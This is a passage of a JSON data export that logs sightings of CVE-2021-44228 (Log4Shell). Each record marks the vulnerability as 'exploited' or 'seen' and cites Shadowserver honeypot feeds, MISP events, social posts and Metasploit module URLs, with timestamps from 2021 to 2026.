"source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-21)", "content": "", "creation_timestamp": "2025-08-21T00:00:00.000000Z"}, {"uuid": "1a3fed62-1155-4ff5-b9b0-6e7198d70fac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-29)", "content": "", "creation_timestamp": "2025-09-29T00:00:00.000000Z"}, {"uuid": "b670e4ca-b448-459b-8e8c-a39a1b3bfa12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-26)", "content": "", "creation_timestamp": "2025-11-26T00:00:00.000000Z"}, {"uuid": "9a282f5f-555e-44b8-a678-f64b78024156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/nunesfb/3ae04f694040b1e2c4712833771dd653", "content": "", "creation_timestamp": "2025-09-11T18:20:38.000000Z"}, {"uuid": "8f4c6c74-7a0a-49cd-8053-4ba81227cc01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-02)", "content": "", "creation_timestamp": "2025-11-02T00:00:00.000000Z"}, {"uuid": "15b60c23-47d5-466f-9f67-1215f4a21fd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "71f3b557-5787-4881-a83c-59b6cb38bfac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "55615de7-40ad-4491-b954-fd1a2df6a8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-10)", "content": "", "creation_timestamp": "2025-10-10T00:00:00.000000Z"}, {"uuid": "b4a1c7a6-4278-4ff3-b99c-40eb38da830e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-07)", "content": "", "creation_timestamp": "2025-10-07T00:00:00.000000Z"}, {"uuid": "ea18ca8b-f5c7-4fb4-a9a3-b7a811cdf81b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "3e7b8b33-cfa6-4184-b82e-9892a38fb39d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-08)", "content": "", "creation_timestamp": "2025-09-08T00:00:00.000000Z"}, {"uuid": "2d70d4c8-b68e-45c3-98a4-10108e6b1a5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-24)", "content": "", "creation_timestamp": "2025-10-24T00:00:00.000000Z"}, {"uuid": "bbd33e60-1f5a-49f5-beee-2f6ea109ff72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-27)", "content": "", "creation_timestamp": "2025-11-27T00:00:00.000000Z"}, {"uuid": "f9f168e1-bedd-45fe-b87b-f88e37891281", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "888097d7-e245-49dd-a4f9-3ebaa52b9f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m32svihqdm27", "content": "", "creation_timestamp": "2025-10-13T08:40:07.661611Z"}, {"uuid": "ef8c9fb1-796d-42c1-b5a0-e9bf192cf410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/4ad9ed67-5cc3-5de2-849d-1a1910431785", "content": "", "creation_timestamp": "2025-09-09T11:33:06.000000Z"}, {"uuid": "08a28137-aad2-4763-b1d0-75d166476dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-18)", "content": "", "creation_timestamp": "2025-11-18T00:00:00.000000Z"}, {"uuid": "4ab5b95f-9b95-452d-a36a-62322f6854ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-24)", "content": "", "creation_timestamp": "2025-08-24T00:00:00.000000Z"}, {"uuid": "958295f8-fff0-41c7-ab4b-f406f8a2fbc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/log4shell_scanner.rb", "content": "", "creation_timestamp": "2021-12-16T17:05:03.000000Z"}, {"uuid": "c36092ec-f53f-4b40-8292-c2d506daa246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/mobileiron_core_log4shell.rb", "content": "", "creation_timestamp": "2022-08-02T17:47:06.000000Z"}, {"uuid": "677ea0bd-95d7-4323-9540-94be63ba796e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "c17fb4b3-0f2c-4636-b14c-92ac5543bb7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-17)", "content": "", "creation_timestamp": "2025-10-17T00:00:00.000000Z"}, {"uuid": "b4e588b4-9ff2-4b6c-a94a-5f263e33ae09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-30)", "content": "", "creation_timestamp": "2025-11-30T00:00:00.000000Z"}, {"uuid": "ea9d8293-2f24-4dc2-b84e-7699ff4d68e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "b09c5b09-4b6d-4ab6-9883-40e521cfd6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3m3zjbwfjw22l", "content": "", "creation_timestamp": "2025-10-25T13:40:41.394036Z"}, {"uuid": "f24a3911-2048-486d-9d21-91ddc884d8fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/tailtame.bsky.social/post/3lyfzmmzzos2v", "content": "", "creation_timestamp": "2025-09-09T15:24:11.242483Z"}, {"uuid": "772f82bc-50c5-4c16-b095-3fecbc42f570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-18)", "content": "", "creation_timestamp": "2025-09-18T00:00:00.000000Z"}, {"uuid": "fd71b0bd-883e-4b57-958c-ef79010f81c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-15)", "content": "", "creation_timestamp": "2025-09-15T00:00:00.000000Z"}, {"uuid": "2b39575f-5737-4df8-82cc-c52cea3598ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-25)", "content": "", "creation_timestamp": "2025-08-25T00:00:00.000000Z"}, {"uuid": "874324e1-0986-496e-acb7-f54ba308d58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-26)", "content": "", "creation_timestamp": "2025-08-26T00:00:00.000000Z"}, {"uuid": "c9200abb-9774-4c9b-bdf4-6a7e520f6638", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-14)", "content": "", "creation_timestamp": "2025-11-14T00:00:00.000000Z"}, {"uuid": "b6c21a07-d3bc-4a4e-b45a-012828b399bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-29)", "content": "", "creation_timestamp": "2025-08-29T00:00:00.000000Z"}, {"uuid": "9221e14d-e0d6-46da-9b3a-c19a3e9f2489", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-27)", "content": "", "creation_timestamp": "2025-08-27T00:00:00.000000Z"}, {"uuid": "abf43b77-56d9-4362-972e-bb3db5060dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:44.000000Z"}, {"uuid": "0f364e2b-eeb8-4e3f-93bc-2029cca9887c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-11)", "content": "", "creation_timestamp": "2025-09-11T00:00:00.000000Z"}, {"uuid": "4e03e44c-2583-4278-8feb-31e972e34177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-30)", "content": "", "creation_timestamp": "2025-09-30T00:00:00.000000Z"}, {"uuid": "d916f9ca-1a7f-4cb9-a7de-5188c2fce528", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-28)", "content": "", "creation_timestamp": "2025-08-28T00:00:00.000000Z"}, {"uuid": "682e49ab-16c4-4aca-b43f-c7f25257063d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-26)", "content": "", "creation_timestamp": "2025-09-26T00:00:00.000000Z"}, {"uuid": "7ed0a822-5ac5-412e-a465-8b2a351f12de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:00:59.000000Z"}, {"uuid": "6665837f-7aba-4cd9-8564-5d33f0eea5ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-29)", "content": "", "creation_timestamp": "2025-11-29T00:00:00.000000Z"}, {"uuid": "fd288dfc-2fb9-4ac0-b26d-886a41beaa9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "4df7ee73-7b25-4cf1-a03c-9fe0a588d2de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-31)", "content": "", "creation_timestamp": "2025-08-31T00:00:00.000000Z"}, {"uuid": "18f595b7-d4bf-4ddb-8ae6-eb7660912629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-30)", "content": "", "creation_timestamp": "2025-08-30T00:00:00.000000Z"}, {"uuid": "de543d0d-e141-42e5-988a-52f83211e33d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-04)", "content": "", "creation_timestamp": "2025-11-04T00:00:00.000000Z"}, {"uuid": "ddf5695c-b413-48f9-be8b-164e6df74d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/3445a876-cced-4346-bf37-e276ba39cff4", "content": "", "creation_timestamp": "2025-09-02T18:30:14.000000Z"}, {"uuid": "106f21ca-7408-4937-b668-3d023aa619b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb", "content": "", "creation_timestamp": "2022-01-21T19:09:41.000000Z"}, {"uuid": "927cc296-9b58-4850-9bd7-6a422a2d4dc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-26)", "content": "", "creation_timestamp": "2025-09-26T00:00:00.000000Z"}, {"uuid": "9674cb46-e6c7-4ed8-9e8d-0219eacd6c80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/log4shell_header_injection.rb", "content": "", "creation_timestamp": "2022-01-11T22:11:28.000000Z"}, {"uuid": "3aadc7ae-28c8-498f-8fe9-e222539be865", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-01)", "content": "", "creation_timestamp": "2025-09-01T00:00:00.000000Z"}, {"uuid": "c5aa6551-776f-4f4f-a670-2d86a3700220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "28893cdf-d8ea-44ef-bdb2-8cca28ddf506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-02)", "content": "", "creation_timestamp": "2025-09-02T00:00:00.000000Z"}, {"uuid": "149de89a-d080-4411-951d-e145a0190f96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-03)", "content": "", "creation_timestamp": "2025-09-03T00:00:00.000000Z"}, {"uuid": "5385ba63-7967-42a5-8bc7-bb2296e9b9d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vmware_vcenter_log4shell.rb", "content": "", "creation_timestamp": "2022-01-19T22:51:50.000000Z"}, {"uuid": "8eaa8e6b-d32c-47a3-8195-7e34bdbb5baf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-02)", "content": "", "creation_timestamp": "2025-12-02T00:00:00.000000Z"}, {"uuid": "9f5559f2-e337-4c2a-b127-81b62d23d75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-04)", "content": "", "creation_timestamp": "2025-09-04T00:00:00.000000Z"}, {"uuid": "6fd8141d-e92f-4e7c-a616-16333d56da09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-04)", "content": "", "creation_timestamp": "2025-12-04T00:00:00.000000Z"}, {"uuid": "20e4cddd-2c26-4716-9214-7ce80bf03da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-24)", "content": "", "creation_timestamp": "2025-09-24T00:00:00.000000Z"}, {"uuid": "4cb88a50-c428-4c68-9cb6-471919d18e8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-03)", "content": "", "creation_timestamp": "2025-12-03T00:00:00.000000Z"}, {"uuid": "dcd5f5e2-09d1-4e09-b0c7-1741f23d1b4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-05)", "content": "", "creation_timestamp": "2025-12-05T00:00:00.000000Z"}, {"uuid": "47ab22c1-7a86-4430-9718-6e32aab4a27e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfpi7yu5vj2x", "content": "", "creation_timestamp": "2026-02-25T20:07:00.343353Z"}, {"uuid": "b810fe17-3b43-4cb2-9ffd-20a57244e21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-04)", "content": "", "creation_timestamp": "2026-03-04T00:00:00.000000Z"}, {"uuid": "a2c1afb1-d5da-46ab-898e-cd49b1c75728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-12)", "content": "", "creation_timestamp": "2026-02-12T00:00:00.000000Z"}, {"uuid": "399b208d-a7a1-4c51-b00e-5c1c467b6cfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/NidTamil/547e3b4be1810ef00fae52c388d20f75", "content": "", "creation_timestamp": "2025-12-07T03:02:51.000000Z"}, {"uuid": "4a6d3696-8644-4fb0-95f0-6debbacf5daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-06)", "content": "", "creation_timestamp": "2025-12-06T00:00:00.000000Z"}, {"uuid": "8a033404-7850-42c9-bb54-6c87862624d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-07)", "content": "", "creation_timestamp": "2026-02-07T00:00:00.000000Z"}, {"uuid": "b424b350-1671-4b57-a695-bac1aff5363f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-07)", "content": "", "creation_timestamp": "2025-12-07T00:00:00.000000Z"}, {"uuid": "772e86ef-7b3f-4885-965b-3439746b08d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3meoptymcvd2t", "content": "", "creation_timestamp": "2026-02-12T19:25:35.878689Z"}, {"uuid": "2129cd0f-d1fa-4a73-9125-8b78eab32eac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-31)", "content": "", "creation_timestamp": "2026-01-31T00:00:00.000000Z"}, {"uuid": "f341a0fb-7037-471d-90b9-1bc6e2c287a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-01)", "content": "", "creation_timestamp": "2026-03-01T00:00:00.000000Z"}, {"uuid": "b50fc2b6-42b9-4157-a839-5e1e37ea857f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-23)", "content": "", "creation_timestamp": "2026-02-23T00:00:00.000000Z"}, {"uuid": "6c1edcba-cace-4e43-8cde-eb090220d0eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-22)", "content": "", "creation_timestamp": "2026-02-22T00:00:00.000000Z"}, {"uuid": "75835434-8d2c-4264-a74d-40f579aa2bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-10)", "content": "", "creation_timestamp": "2026-02-10T00:00:00.000000Z"}, {"uuid": "27ffb592-3935-4427-a478-816cdd76006f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-09)", "content": "", "creation_timestamp": "2025-12-09T00:00:00.000000Z"}, {"uuid": "8dae9a4a-dbb1-4681-94fa-de5d6735fac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - 